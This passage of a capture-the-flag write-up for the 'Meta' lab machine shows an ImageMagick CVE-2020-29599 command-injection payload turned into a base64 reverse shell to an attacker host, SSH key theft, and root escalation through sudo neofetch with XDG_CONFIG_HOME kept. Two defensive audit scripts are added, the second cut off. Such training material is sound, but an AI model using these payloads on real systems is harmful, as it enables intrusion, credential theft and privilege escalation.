# Shorten the output of the uptime function
#
# Default: 'on'
# Values: 'on', 'off', 'tiny'
# Flag: --uptime_shorthand
#
# Example:
# on: '2 days, 10 hours, 3 mins'
# off: '2 days, 10 hours, 3 minutes'
# tiny: '2d 10h 3m'
uptime_shorthand="on"


# Memory


# Show memory pecentage in output.
#
# Default: 'off'
# Values: 'on', 'off'
# Flag: --memory_percent
#
# Example:
# on: '1801MiB / 7881MiB (22%)'
# off: '1801MiB / 7881MiB'
memory_percent="off"


# Packages


# Show/Hide Package Manager names.
#
# Default: 'tiny'
# Values: 'on', 'tiny' 'off'
# Flag: --package_managers
#
# Example:
# on: '998 (pacman), 8 (flatpak), 4 (snap)'
# tiny: '908 (pacman, flatpak, snap)'
# off: '908'
package_managers="on"


# Shell


# Show the path to $SHELL
#
# Default: 'off'
# Values: 'on', 'off'
# Flag: --shell_path
#
# Example:
# on: '/bin/bash'
# off: 'bash'
shell_path="off"

# Show $SHELL version
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --shell_version
#
# Example:
# on: 'bash 4.4.5'
# off: 'bash'
shell_version="on"


# CPU


# CPU speed type
#
# Default: 'bios_limit'
# Values: 'scaling_cur_freq', 'scaling_min_freq', 'scaling_max_freq', 'bios_limit'.
# Flag: --speed_type
# Supports: Linux with 'cpufreq'
# NOTE: Any file in '/sys/devices/system/cpu/cpu0/cpufreq' can be used as a value.
speed_type="bios_limit"

# CPU speed shorthand
#
# Default: 'off'
# Values: 'on', 'off'.
# Flag: --speed_shorthand
# NOTE: This flag is not supported in systems with CPU speed less than 1 GHz
#
# Example:
# on: 'i7-6500U (4) @ 3.1GHz'
# off: 'i7-6500U (4) @ 3.100GHz'
speed_shorthand="off"

# Enable/Disable CPU brand in output.
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --cpu_brand
#
# Example:
# on: 'Intel i7-6500U'
# off: 'i7-6500U (4)'
cpu_brand="on"

# CPU Speed
# Hide/Show CPU speed.
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --cpu_speed
#
# Example:
# on: 'Intel i7-6500U (4) @ 3.1GHz'
# off: 'Intel i7-6500U (4)'
cpu_speed="on"

# CPU Cores
# Display CPU cores in output
#
# Default: 'logical'
# Values: 'logical', 'physical', 'off'
# Flag: --cpu_cores
# Support: 'physical' doesn't work on BSD.
#
# Example:
# logical: 'Intel i7-6500U (4) @ 3.1GHz' (All virtual cores)
# physical: 'Intel i7-6500U (2) @ 3.1GHz' (All physical cores)
# off: 'Intel i7-6500U @ 3.1GHz'
cpu_cores="logical"

# CPU Temperature
# Hide/Show CPU temperature.
# Note the temperature is added to the regular CPU function.
#
# Default: 'off'
# Values: 'C', 'F', 'off'
# Flag: --cpu_temp
# Supports: Linux, BSD
# NOTE: For FreeBSD and NetBSD-based systems, you'll need to enable
# coretemp kernel module. This only supports newer Intel processors.
#
# Example:
# C: 'Intel i7-6500U (4) @ 3.1GHz [27.2°C]'
# F: 'Intel i7-6500U (4) @ 3.1GHz [82.0°F]'
# off: 'Intel i7-6500U (4) @ 3.1GHz'
cpu_temp="off"


# GPU


# Enable/Disable GPU Brand
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --gpu_brand
#
# Example:
# on: 'AMD HD 7950'
# off: 'HD 7950'
gpu_brand="on"

# Which GPU to display
#
# Default: 'all'
# Values: 'all', 'dedicated', 'integrated'
# Flag: --gpu_type
# Supports: Linux
#
# Example:
# all:
# GPU1: AMD HD 7950
# GPU2: Intel Integrated Graphics
#
# dedicated:
# GPU1: AMD HD 7950
#
# integrated:
# GPU1: Intel Integrated Graphics
gpu_type="all"


# Resolution


# Display refresh rate next to each monitor
# Default: 'off'
# Values: 'on', 'off'
# Flag: --refresh_rate
# Supports: Doesn't work on Windows.
#
# Example:
# on: '1920x1080 @ 60Hz'
# off: '1920x1080'
refresh_rate="off"


# Gtk Theme / Icons / Font


# Shorten output of GTK Theme / Icons / Font
#
# Default: 'off'
# Values: 'on', 'off'
# Flag: --gtk_shorthand
#
# Example:
# on: 'Numix, Adwaita'
# off: 'Numix [GTK2], Adwaita [GTK3]'
gtk_shorthand="off"


# Enable/Disable gtk2 Theme / Icons / Font
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --gtk2
#
# Example:
# on: 'Numix [GTK2], Adwaita [GTK3]'
# off: 'Adwaita [GTK3]'
gtk2="on"

# Enable/Disable gtk3 Theme / Icons / Font
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --gtk3
#
# Example:
# on: 'Numix [GTK2], Adwaita [GTK3]'
# off: 'Numix [GTK2]'
gtk3="on"


# IP Address


# Website to ping for the public IP
#
# Default: 'http://ident.me'
# Values: 'url'
# Flag: --ip_host
public_ip_host="http://ident.me"

# Public IP timeout.
#
# Default: '2'
# Values: 'int'
# Flag: --ip_timeout
public_ip_timeout=2


# Disk


# Which disks to display.
# The values can be any /dev/sdXX, mount point or directory.
# NOTE: By default we only show the disk info for '/'.
#
# Default: '/'
# Values: '/', '/dev/sdXX', '/path/to/drive'.
# Flag: --disk_show
#
# Example:
# disk_show=('/' '/dev/sdb1'):
# 'Disk (/): 74G / 118G (66%)'
# 'Disk (/mnt/Videos): 823G / 893G (93%)'
#
# disk_show=('/'):
# 'Disk (/): 74G / 118G (66%)'
#
disk_show=('/')

# Disk subtitle.
# What to append to the Disk subtitle.
#
# Default: 'mount'
# Values: 'mount', 'name', 'dir'
# Flag: --disk_subtitle
#
# Example:
# name: 'Disk (/dev/sda1): 74G / 118G (66%)'
# 'Disk (/dev/sdb2): 74G / 118G (66%)'
#
# mount: 'Disk (/): 74G / 118G (66%)'
# 'Disk (/mnt/Local Disk): 74G / 118G (66%)'
# 'Disk (/mnt/Videos): 74G / 118G (66%)'
#
# dir: 'Disk (/): 74G / 118G (66%)'
# 'Disk (Local Disk): 74G / 118G (66%)'
# 'Disk (Videos): 74G / 118G (66%)'
disk_subtitle="mount"


# Song


# Manually specify a music player.
#
# Default: 'auto'
# Values: 'auto', 'player-name'
# Flag: --music_player
#
# Available values for 'player-name':
#
# amarok
# audacious
# banshee
# bluemindo
# clementine
# cmus
# deadbeef
# deepin-music
# dragon
# elisa
# exaile
# gnome-music
# gmusicbrowser
# guayadeque
# iTunes
# juk
# lollypop
# mocp
# mopidy
# mpd
# netease-cloud-music
# pogo
# pragha
# qmmp
# quodlibet
# rhythmbox
# sayonara
# smplayer
# spotify
# tomahawk
# vlc
# xmms2d
# yarock
music_player="auto"

# Format to display song information.
#
# Default: '%artist% - %album% - %title%'
# Values: '%artist%', '%album%', '%title%'
# Flag: --song_format
#
# Example:
# default: 'Song: Jet - Get Born - Sgt Major'
song_format="%artist% - %album% - %title%"

# Print the Artist, Album and Title on separate lines
#
# Default: 'off'
# Values: 'on', 'off'
# Flag: --song_shorthand
#
# Example:
# on: 'Artist: The Fratellis'
# 'Album: Costello Music'
# 'Song: Chelsea Dagger'
#
# off: 'Song: The Fratellis - Costello Music - Chelsea Dagger'
song_shorthand="off"

# 'mpc' arguments (specify a host, password etc).
#
# Default: ''
# Example: mpc_args=(-h HOST -P PASSWORD)
mpc_args=()


# Text Colors


# Text Colors
#
# Default: 'distro'
# Values: 'distro', 'num' 'num' 'num' 'num' 'num' 'num'
# Flag: --colors
#
# Each number represents a different part of the text in
# this order: 'title', '@', 'underline', 'subtitle', 'colon', 'info'
#
# Example:
# colors=(distro) - Text is colored based on Distro colors.
# colors=(4 6 1 8 8 6) - Text is colored in the order above.
colors=(distro)


# Text Options


# Toggle bold text
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --bold
bold="on"

# Enable/Disable Underline
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --underline
underline_enabled="on"

# Underline character
#
# Default: '-'
# Values: 'string'
# Flag: --underline_char
underline_char="-"


# Info Separator
# Replace the default separator with the specified string.
#
# Default: ':'
# Flag: --separator
#
# Example:
# separator="->": 'Shell-> bash'
# separator=" =": 'WM = dwm'
separator=":"


# Color Blocks


# Color block range
# The range of colors to print.
#
# Default: '0', '7'
# Values: 'num'
# Flag: --block_range
#
# Example:
#
# Display colors 0-7 in the blocks. (8 colors)
# neofetch --block_range 0 7
#
# Display colors 0-15 in the blocks. (16 colors)
# neofetch --block_range 0 15
block_range=(0 7)

# Toggle color blocks
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --color_blocks
color_blocks="on"

# Color block width in spaces
#
# Default: '3'
# Values: 'num'
# Flag: --block_width
block_width=3

# Color block height in lines
#
# Default: '1'
# Values: 'num'
# Flag: --block_height
block_height=1


# Progress Bars


# Bar characters
#
# Default: '-', '='
# Values: 'string', 'string'
# Flag: --bar_char
#
# Example:
# neofetch --bar_char 'elapsed' 'total'
# neofetch --bar_char '-' '='
bar_char_elapsed="-"
bar_char_total="="

# Toggle Bar border
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --bar_border
bar_border="on"

# Progress bar length in spaces
# Number of chars long to make the progress bars.
#
# Default: '15'
# Values: 'num'
# Flag: --bar_length
bar_length=15

# Progress bar colors
# When set to distro, uses your distro's logo colors.
#
# Default: 'distro', 'distro'
# Values: 'distro', 'num'
# Flag: --bar_colors
#
# Example:
# neofetch --bar_colors 3 4
# neofetch --bar_colors distro 5
bar_color_elapsed="distro"
bar_color_total="distro"


# Info display
# Display a bar with the info.
#
# Default: 'off'
# Values: 'bar', 'infobar', 'barinfo', 'off'
# Flags: --cpu_display
# --memory_display
# --battery_display
# --disk_display
#
# Example:
# bar: '[---=======]'
# infobar: 'info [---=======]'
# barinfo: '[---=======] info'
# off: 'info'
cpu_display="off"
memory_display="off"
battery_display="off"
disk_display="off"


# Backend Settings


# Image backend.
#
# Default: 'ascii'
# Values: 'ascii', 'caca', 'chafa', 'jp2a', 'iterm2', 'off',
# 'termpix', 'pixterm', 'tycat', 'w3m', 'kitty'
# Flag: --backend
image_backend="ascii"

# Image Source
#
# Which image or ascii file to display.
#
# Default: 'auto'
# Values: 'auto', 'ascii', 'wallpaper', '/path/to/img', '/path/to/ascii', '/path/to/dir/'
# 'command output (neofetch --ascii "$(fortune | cowsay -W 30)")'
# Flag: --source
#
# NOTE: 'auto' will pick the best image source for whatever image backend is used.
# In ascii mode, distro ascii art will be used and in an image mode, your
# wallpaper will be used.
image_source="auto"


# Ascii Options


# Ascii distro
# Which distro's ascii art to display.
#
# Default: 'auto'
# Values: 'auto', 'distro_name'
# Flag: --ascii_distro
#
# NOTE: Arch and Ubuntu have 'old' logo variants.
# Change this to 'arch_old' or 'ubuntu_old' to use the old logos.
# NOTE: Ubuntu has flavor variants.
# Change this to 'Lubuntu', 'Xubuntu', 'Ubuntu-GNOME' or 'Ubuntu-Budgie' to use the flavors.
# NOTE: Arch, Crux and Gentoo have a smaller logo variant.
# Change this to 'arch_small', 'crux_small' or 'gentoo_small' to use the small logos.
ascii_distro="auto"

# Ascii Colors
#
# Default: 'distro'
# Values: 'distro', 'num' 'num' 'num' 'num' 'num' 'num'
# Flag: --ascii_colors
#
# Example:
# ascii_colors=(distro) - Ascii is colored based on Distro colors.
# ascii_colors=(4 6 1 8 8 6) - Ascii is colored using these colors.
ascii_colors=(distro)

# Bold ascii logo
# Whether or not to bold the ascii logo.
#
# Default: 'on'
# Values: 'on', 'off'
# Flag: --ascii_bold
ascii_bold="on"


# Image Options


# Image loop
# Setting this to on will make neofetch redraw the image constantly until
# Ctrl+C is pressed. This fixes display issues in some terminal emulators.
#
# Default: 'off'
# Values: 'on', 'off'
# Flag: --loop
image_loop="off"

# Thumbnail directory
#
# Default: '~/.cache/thumbnails/neofetch'
# Values: 'dir'
thumbnail_dir="${XDG_CACHE_HOME:-${HOME}/.cache}/thumbnails/neofetch"

# Crop mode
#
# Default: 'normal'
# Values: 'normal', 'fit', 'fill'
# Flag: --crop_mode
#
# See this wiki page to learn about the fit and fill options.
# https://github.com/dylanaraps/neofetch/wiki/What-is-Waifu-Crop%3F
crop_mode="normal"

# Crop offset
# Note: Only affects 'normal' crop mode.
#
# Default: 'center'
# Values: 'northwest', 'north', 'northeast', 'west', 'center'
# 'east', 'southwest', 'south', 'southeast'
# Flag: --crop_offset
crop_offset="center"

# Image size
# The image is half the terminal width by default.
#
# Default: 'auto'
# Values: 'auto', '00px', '00%', 'none'
# Flags: --image_size
# --size
image_size="auto"

# Gap between image and text
#
# Default: '3'
# Values: 'num', '-num'
# Flag: --gap
gap=3

# Image offsets
# Only works with the w3m backend.
#
# Default: '0'
# Values: 'px'
# Flags: --xoffset
# --yoffset
yoffset=0
xoffset=0

# Image background color
# Only works with the w3m backend.
#
# Default: ''
# Values: 'color', 'blue'
# Flag: --bg_color
background_color=


# Misc Options

# Stdout mode
# Turn off all colors and disables image backend (ASCII/Image).
# Useful for piping into another command.
# Default: 'off'
# Values: 'on', 'off'
stdout="off"
www-data@meta:/tmp$

www-data@meta:/tmp$ cat /usr/local/bin/convert_images.sh
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
www-data@meta:/tmp$

22. The script runs a single command that calls one program, so let's take a closer look at that program

www-data@meta:/tmp$ ls -la /usr/local/bin/mogrify
lrwxrwxrwx 1 root root 6 Aug 29 2021 /usr/local/bin/mogrify -> magick
www-data@meta:/tmp$ /usr/local/bin/mogrify -version
Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org
Copyright: © 1999-2020 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): fontconfig freetype jng jpeg png x xml zlib
www-data@meta:/tmp$

23. Now that we know the software and its exact version, let's search for vulnerabilities

ImageMagick 7.0.10-36 vulnerability

CVE-2020-29599

https://blog.csdn.net/zzzzz1284/article/details/129496149

https://github.com/vulhub/vulhub/blob/master/imagemagick/CVE-2020-29599/poc.svg

24. Following the references above, let's exploit the vulnerability

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.140 - - [30/Jan/2024 14:35:16] "GET /poc.svg HTTP/1.1" 200 -

www-data@meta:/tmp$ wget http://10.10.14.4/poc.svg
--2024-01-30 01:35:15-- http://10.10.14.4/poc.svg
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 398 [image/svg+xml]
Saving to: 'poc.svg'

poc.svg 100%[===================>] 398 --.-KB/s in 0.004s

2024-01-30 01:35:16 (87.4 KB/s) - 'poc.svg' saved [398/398]

www-data@meta:/tmp$ ls
poc.svg pspy64
www-data@meta:/tmp$

www-data@meta:/tmp$ ls
poc.svg pspy64
www-data@meta:/tmp$ identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.004
www-data@meta:/tmp$ convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
www-data@meta:/tmp$

www-data@meta:/tmp$ ls
0wned poc.svg pspy64
www-data@meta:/tmp$ cat 0wned
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@meta:/tmp$

25. Let's look at the contents of poc.svg

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat poc.svg
<image authenticate='ff" `echo $(id)> ./0wned`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>

26. The technique works; to make use of it we have to combine it with the scheduled process found earlier, so let's modify the PoC

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'bash -i >& /dev/tcp/10.10.14.4/10086 0>&1 ' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=

# change poc.svg to the following content

<image authenticate='ff" `echo "YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=" | base64 -d | bash`;"'>

27. Modify the exploit file on the target

www-data@meta:/tmp$ 
www-data@meta:/tmp$ vim poc.svg
www-data@meta:/tmp$ cat poc.svg
<image authenticate='ff" `echo "YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNC8xMDA4NiAwPiYxIAo=" | base64 -d | bash`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
www-data@meta:/tmp$

28. Try the exploit

www-data@meta:/tmp$ cp /tmp/poc.svg /var/www/dev01.artcorp.htb/convert_images/
www-data@meta:/tmp$ ls -la /var/www/dev01.artcorp.htb/convert_images/
total 8
drwxrwxr-x 2 root www-data 4096 Jan 4 2022 .
drwxr-xr-x 4 root root 4096 Oct 18 2021 ..
</poc.svg /var/www/dev01.artcorp.htb/convert_images/
www-data@meta:/tmp$ ls -la /var/www/dev01.artcorp.htb/convert_images/
total 12
drwxrwxr-x 2 root www-data 4096 Jan 30 01:49 .
drwxr-xr-x 4 root root 4096 Oct 18 2021 ..
-rw-r--r-- 1 www-data www-data 466 Jan 30 01:49 poc.svg
www-data@meta:/tmp$

29. A shell as the target user is obtained

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 50490
bash: cannot set terminal process group (4687): Inappropriate ioctl for device
bash: no job control in this shell
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ id
id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:/var/www/dev01.artcorp.htb/convert_images$ cd ~
cd ~
thomas@meta:~$
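As an added example (not code from the writeup or from ImageMagick), a small audit script that turns the two findings above into a check: it parses the -version line for a release older than the fix recorded in the CVE entry and inspects a policy.xml for denial of the MSL and PDF coders that the PoC chains together. The two policy snippets are constructed samples.

```python
"""Audit an ImageMagick install against CVE-2020-29599.

Added example (not from the writeup): checks the version string and whether
policy.xml denies the MSL and PDF coders used by the PoC.
"""
import re
import xml.etree.ElementTree as ET

# First fixed releases recorded in the CVE entry: 7.0.10-40 (7.x), 6.9.11-40 (6.x)
FIXED = {7: (7, 0, 10, 40), 6: (6, 9, 11, 40)}

def parse_version(version_output):
    """Extract (major, minor, patch, build) from 'magick -version' output."""
    m = re.search(r"Version:\s*ImageMagick\s+(\d+)\.(\d+)\.(\d+)-(\d+)", version_output)
    if not m:
        raise ValueError("no ImageMagick version line found")
    return tuple(int(x) for x in m.groups())

def is_vulnerable_version(ver):
    """True when the release predates the fix for its major version."""
    fixed = FIXED.get(ver[0])
    return fixed is not None and ver < fixed

def denied_coders(policy_xml):
    """Coder names that policy.xml grants no rights to (pattern may be {A,B,C})."""
    denied = set()
    for p in ET.fromstring(policy_xml).iter("policy"):
        if p.get("domain") == "coder" and p.get("rights") == "none":
            for name in p.get("pattern", "").strip("{}").split(","):
                denied.add(name.strip().upper())
    return denied

def audit(version_output, policy_xml):
    """Return a list of findings; an empty list means nothing to report."""
    ver = parse_version(version_output)
    findings = []
    if is_vulnerable_version(ver):
        findings.append("version %d.%d.%d-%d predates the CVE-2020-29599 fix" % ver)
    denied = denied_coders(policy_xml)
    for coder in ("MSL", "PDF"):
        if coder not in denied:
            findings.append("%s coder is not denied in policy.xml" % coder)
    return findings

# Version line copied from the box; both policies below are constructed samples.
SAMPLE_VERSION = "Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29 https://imagemagick.org"
DEFAULT_POLICY = '<policymap><policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,XPS}"/></policymap>'
HARDENED_POLICY = '<policymap><policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS,MSL}"/></policymap>'

if __name__ == "__main__":
    for label, policy in (("default", DEFAULT_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, audit(SAMPLE_VERSION, policy))
```

Denying the coders in policy.xml blocks the MSL/PDF path the PoC uses even on an unpatched build, but the version finding remains until ImageMagick is upgraded.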

30. Grab the flag

thomas@meta:~$ ls
ls
user.txt
thomas@meta:~$ cat user.txt
cat user.txt
af6d509b3bb924e92d8d08724746d4ff
thomas@meta:~$

0x02 Obtaining System Privileges

31. Next comes enumeration for privilege escalation. Before that, download the SSH private key and log in with it, which gives a more stable session for enumeration

thomas@meta:~$ ls -la
ls -la
total 32
drwxr-xr-x 4 thomas thomas 4096 Jan 17 2022 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
lrwxrwxrwx 1 root root 9 Aug 29 2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 Aug 29 2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29 2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30 2021 .config
-rw-r--r-- 1 thomas thomas 807 Aug 29 2021 .profile
drwx------ 2 thomas thomas 4096 Jan 4 2022 .ssh
-rw-r----- 1 root thomas 33 Jan 29 21:54 user.txt
thomas@meta:~$ cd .ssh
cd .ssh
thomas@meta:~/.ssh$ ls -la
ls -la
total 20
drwx------ 2 thomas thomas 4096 Jan 4 2022 .
drwxr-xr-x 4 thomas thomas 4096 Jan 17 2022 ..
-rw-r--r-- 1 thomas thomas 563 Jan 4 2022 authorized_keys
-rw------- 1 thomas thomas 2590 Aug 29 2021 id_rsa
-rw-r--r-- 1 thomas thomas 563 Aug 29 2021 id_rsa.pub
thomas@meta:~/.ssh$

thomas@meta:~/.ssh$ python3 -m http.server 8080
python3 -m http.server 8080

┌──(kali㉿offsec)-[~/Desktop]
└─$ wget http://10.10.11.140:8080/id_rsa
--2024-01-30 14:54:11-- http://10.10.11.140:8080/id_rsa
正在连接 10.10.11.140:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2590 (2.5K) [application/octet-stream]
正在保存至: “id_rsa”

id_rsa 100%[===============================>] 2.53K --.-KB/s 用时 0s

2024-01-30 14:54:12 (167 MB/s) - 已保存 “id_rsa” [2590/2590])

┌──(kali㉿offsec)-[~/Desktop]
└─$ chmod 600 id_rsa

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -i id_rsa thomas@10.10.11.140
The authenticity of host '10.10.11.140 (10.10.11.140)' can't be established.
ED25519 key fingerprint is SHA256:Y8C2lOecv5ZDp3I6M5zjDUYDVsc3p/pgjF9HVRPioqQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.140' (ED25519) to the list of known hosts.
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
thomas@meta:~$

32. Enumerate the sudo privileges

thomas@meta:~$ id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
thomas@meta:~$ sudo -l
Matching Defaults entries for thomas on meta:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
(root) NOPASSWD: /usr/bin/neofetch \"\"
thomas@meta:~$

33. Run the program; privilege escalation will have to go through it

thomas@meta:~$ 
thomas@meta:~$ /usr/bin/neofetch
_,met$$$$$gg. thomas@meta
,g$$$$$$$$$$$$$$$P. -----------
,g$$P" """Y$$.". OS: Debian GNU/Linux 10 (buster) x86_64
,$$P' `$$$. Host: VMware Virtual Platform None
',$$P ,ggs. `$$b: Kernel: 4.19.0-17-amd64
`d$$' ,$P"' . $$$ Uptime: 4 hours, 2 mins
$$P d$' , $$P Packages: 495 (dpkg)
$$: $$. - ,d$$' Shell: bash 5.0.3
$$; Y$b._ _,d$P' Terminal: /dev/pts/2
Y$$. `.`"Y$$$$P"' CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
`$$b "-.__ GPU: VMware SVGA II Adapter
`Y$$ Memory: 146MiB / 1994MiB
`Y$$.
`$$b.
`Y$$b.
`"Y$b._
`"""

thomas@meta:~$ sudo /usr/bin/neofetch
_,met$$$$$gg. root@meta
,g$$$$$$$$$$$$$$$P. ---------
,g$$P" """Y$$.". OS: Debian GNU/Linux 10 (buster) x86_64
,$$P' `$$$. Host: VMware Virtual Platform None
',$$P ,ggs. `$$b: Kernel: 4.19.0-17-amd64
`d$$' ,$P"' . $$$ Uptime: 4 hours, 3 mins
$$P d$' , $$P Packages: 495 (dpkg)
$$: $$. - ,d$$' Shell: bash 5.0.3
$$; Y$b._ _,d$P' CPU: Intel Xeon Gold 5218 (2) @ 2.294GHz
Y$$. `.`"Y$$$$P"' GPU: VMware SVGA II Adapter
`$$b "-.__ Memory: 146MiB / 1994MiB
`Y$$
`Y$$.
`$$b.
`Y$$b.
`"Y$b._
`"""

thomas@meta:~$

34. One detail worth pointing out: the trailing "" in the rule prevents any other arguments from being passed, so by default the program can only be run without arguments

(root) NOPASSWD: /usr/bin/neofetch \"\"

35. Escalating privileges here involves a new concept

env_keep+=XDG_CONFIG_HOME

When a command is run through sudo, the environment variable XDG_CONFIG_HOME is preserved for that command!

What is the XDG_CONFIG_HOME environment variable?

There is a single base directory relative to which user-specific configuration files should be written. This directory is defined by the environment variable $XDG_CONFIG_HOME. (from https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html)

thomas@meta:~$ ls -la
total 36
drwxr-xr-x 5 thomas thomas 4096 Jan 30 01:54 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
lrwxrwxrwx 1 root root 9 Aug 29 2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas 220 Aug 29 2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29 2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30 2021 .config
drwx------ 3 thomas thomas 4096 Jan 30 01:54 .gnupg
-rw-r--r-- 1 thomas thomas 807 Aug 29 2021 .profile
drwx------ 2 thomas thomas 4096 Jan 4 2022 .ssh
-rw-r----- 1 root thomas 33 Jan 29 21:54 user.txt
thomas@meta:~$ cd .config/
thomas@meta:~/.config$ ls -la
total 12
drwxr-xr-x 3 thomas thomas 4096 Aug 30 2021 .
drwxr-xr-x 5 thomas thomas 4096 Jan 30 01:54 ..
drwxr-xr-x 2 thomas thomas 4096 Dec 20 2021 neofetch
thomas@meta:~/.config$ cd neofetch/
thomas@meta:~/.config/neofetch$ ls -la
total 24
drwxr-xr-x 2 thomas thomas 4096 Dec 20 2021 .
drwxr-xr-x 3 thomas thomas 4096 Aug 30 2021 ..
-rw-r--r-- 1 thomas thomas 14591 Aug 30 2021 config.conf
thomas@meta:~/.config/neofetch$

36. Exploitation hints

https://gtfobins.github.io/gtfobins/neofetch/#sudo

TF=$(mktemp)
echo 'exec /bin/sh' >$TF
sudo neofetch --config $TF

37. Export the XDG_CONFIG_HOME environment variable and execute arbitrary commands as root through our malicious neofetch config file

thomas@meta:~$ cd ~
thomas@meta:~$ export XDG_CONFIG_HOME="$HOME/.config"
thomas@meta:~$ echo 'exec /bin/bash' > .config/neofetch/config.conf
thomas@meta:~$ sudo /usr/bin/neofetch
root@meta:/home/thomas#
root@meta:/home/thomas# cd /root/
root@meta:~# ls
conf root.txt
root@meta:~# cat root.txt
d8601891ec6cf00e8a786db52d42cec2
root@meta:~#
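As an added example (not part of the writeup), a small parser for sudo -l output that flags the combination shown above: a command allowed as root paired with an env_keep variable that steers where the program reads its configuration. The CONFIG_PATH_VARS list and the hardened variant of the output are assumptions.

```python
"""Flag sudo rules where an env_keep'd variable steers the config a root command reads.

Added example (not from the writeup): parses 'sudo -l' output and reports rules
that run as root while a config-location variable survives env_reset.
"""
import re

# Variables that commonly redirect where a program looks for its config file (assumed list).
CONFIG_PATH_VARS = {"XDG_CONFIG_HOME", "XDG_CONFIG_DIRS", "HOME", "ENV", "BASH_ENV"}

def parse_sudo_l(text):
    """Return (kept_env_vars, rules) where each rule is (runas, nopasswd, command)."""
    kept, rules, in_defaults = set(), [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Matching Defaults entries"):
            in_defaults = True
        elif line.startswith("User ") and "may run" in line:
            in_defaults = False
        elif in_defaults:
            # sudo prints env_keep+=VAR or env_keep+="VAR1 VAR2"
            for m in re.finditer(r'env_keep\s*\+?=\s*"?([A-Za-z0-9_ ]+)"?', line):
                kept.update(m.group(1).split())
        else:
            m = re.match(r"\(([^)]+)\)\s*(NOPASSWD:)?\s*(.+)", line)
            if m:
                rules.append((m.group(1).strip(), bool(m.group(2)), m.group(3).strip()))
    return kept, rules

def risky_rules(text):
    """Commands runnable as root while a config-location variable is kept."""
    kept, rules = parse_sudo_l(text)
    leaked = sorted(kept & CONFIG_PATH_VARS)
    if not leaked:
        return []
    return [(cmd, leaked) for runas, _, cmd in rules
            if runas.split(":")[0].strip() in ("root", "ALL")]

# 'sudo -l' output copied from the box, and a constructed hardened variant
# in which the env_keep line has been removed from sudoers.
VULNERABLE = r"""Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=XDG_CONFIG_HOME

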